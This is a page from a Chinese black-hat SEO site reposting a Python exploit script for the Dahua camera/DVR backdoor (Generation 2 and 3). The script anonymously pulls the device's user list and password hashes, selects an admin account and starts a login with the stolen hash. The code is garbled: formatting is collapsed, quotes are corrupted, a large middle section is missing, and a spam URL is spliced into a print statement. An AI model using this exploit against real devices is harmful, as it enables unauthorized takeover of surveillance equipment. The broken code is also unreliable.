黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

大华系统cms漏洞exp

  #!/usr/bin/python2.7 # # Dahua backdoor Generation 2 and 3 # Author: bashis March 2017 # # Credentials: No credentials needed (Anonymous) #Jacked from git history # import string import sys import socket import argparse import urllib, urllib2, httplib import base64 import ssl import json import commentjson # pip install commentjson import hashlib class HTTPconnect: def __init__(self, host, proto, verbose, creds, Raw, noexploit): self.host=host self.proto=proto self.verbose=verbose self.credentials=creds self.Raw=Raw self.noexploit=False self.noexploit=noexploit def Send(self, uri, query_headers, query_data,ID): self.uri=uri self.query_headers=query_headers self.query_data=query_data self.ID=ID # Connect-timeout in seconds timeout=5 socket.setdefaulttimeout(timeout) url=’%s://%s%s’ % (self.proto, self.host, self.uri) if self.verbose: print “[Verbose] Sending:”, url if self.proto==’https’: if hasattr(ssl, ‘_create_unverified_context’): print “[i] Creating SSL Unverified Context” ssl._create_default_https_context=ssl._create_unverified_context if self.credentials: Basic_Auth=self.credentials.split(‘:’) if self.verbose: print “[Verbose] User:”,Basic_Auth[0],”Password:”,Basic_Auth[1] try: 大华系统cms漏洞exp pwd_mgr=urllib2.HTTPPasswordMgrWithDefaultRealm() pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1]) auth_handler=urllib2.HTTPBasicAuthHandler(pwd_mgr) opener=urllib2.build_opener(auth_handler) urllib2.install_opener(opener) except Exception as e: print “[!] Basic Auth Error:”,e sys.exit(1) if self.noexploit and not self.verbose: print “[<] 204 Not Sending!" html="Not sending any data" else: if self.query_data: req=urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers) if self.ID: req.add_header('DhWebClientSessionID',self.ID) else: req=urllib2.Request(url, None, headers=self.query_headers) if self.ID: req.add_header('DhWebClientSessionID',self.ID) rsp=urllib2.urlopen(req) # print rsp if rsp: print "[<] %s OK" % rsp.code if self.Raw: return rsp else: html=rsp.read() return html class Dahua_Backdoor: def __init__(self, rhost, proto, verbose, creds, Raw, noexploit): self.rhost=rhost self.proto=proto self.verbose=verbose self.credentials=creds self.Raw=Raw self.noexploit=False self.noexploit=noexploit # Generation 2 def Gen2(self,response,headers): self.response=response self.headers=headers html=self.response.readlines() for line in html: if line[0]=="#" or line[0]=="/n": continue line=line.split(':')[0:25] if line[1]=='admin': print "[i] Chosing Admin Login: {}, PWD hash: {}".format(line[1],line[2]) ADMIN=line[1] PWD=line[2] break elif line[1]=='888888': print "[i] Choosing Admin Login: {}, PWD hash: {}".format(line[1],line[2]) ADMIN=line[1] PWD=line[2] break else: if line[3]=='1': print "Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2]) ADMIN=line[1] PWD=line[2] break # # Login 1 # print "[>] Requesting our session ID” query_args=”.format(e.code) except Exception as e: print “[!] Detect of target failed (%s)” % e sys.exit(1) print “/n[*] All donehttp://www.xisewbms.cn/n” sys.exit(0)

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » 大华系统cms漏洞exp
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜